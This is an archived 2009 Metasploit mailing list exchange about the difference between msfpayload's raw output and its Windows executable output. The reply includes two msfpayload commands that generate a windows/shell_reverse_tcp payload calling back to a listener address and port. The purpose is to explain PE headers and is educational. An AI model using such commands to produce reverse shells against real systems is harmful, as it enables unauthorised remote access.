Metasploit mailing list archives
raw format of msfpayload
From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Tue, 7 Apr 2009 14:47:54 +0100
Antonios, I think that's correct. If you do: ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 R > temp.raw and ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 X > temp.exe then open up both files with a hex editor you will see that temp.raw contents are included in the temp.exe The different in sizes (thus data) between the raw and executable output is the the information necessary for the Windows OS loader to manage the wrapped executable code (or if you like the temp.raw). Hope that helps. Tasos 2009/4/7 Antonios Atlasis <atlasis at telecom.ece.ntua.gr>
Hello to everybody, I'd like to clarify something, if possible, please. The raw output format of msfpayload is machine language, excluding PE headers of "normal" exe files, correct? Thanks in advance Antonios _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- AM Key ID: 0x5EB17EE7 -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090407/134dd9a3/attachment.htm>
Current thread:
- raw format of msfpayload Antonios Atlasis (Apr 07)
- raw format of msfpayload Anastasios Monachos (Apr 07)